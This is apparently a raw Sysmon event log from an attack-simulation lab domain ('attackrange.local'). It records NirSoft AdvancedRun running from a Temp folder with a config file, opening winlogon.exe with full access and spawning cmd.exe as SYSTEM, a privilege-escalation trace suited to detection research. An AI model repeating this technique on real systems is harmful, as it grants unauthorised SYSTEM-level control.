tiveImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTAC
KRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004011061Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.723{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfgC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004009422Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.757{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 154100x80000000000000004009417Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.760{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe"C:\Windows\System32\NT AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg 
/runATTACKRANGE\Administrator 10341000x80000000000000004009416Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.757{834264DD-DAE7-61EA-1700-000000002702}13003348C:\Windows\System32\svchost.exe{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004009415Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.757{834264DD-DAE7-61EA-1700-000000002702}13003348C:\Windows\System32\svchost.exe{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004009414Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.757{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009413Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.757{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009412Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.757{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009411Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.757{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004009410Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.757{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet 
Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004009409Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.757{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004009408Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.757{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004009407Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.757{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004009406Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.757{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004009405Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.757{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004009404Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004009403Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004009402Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 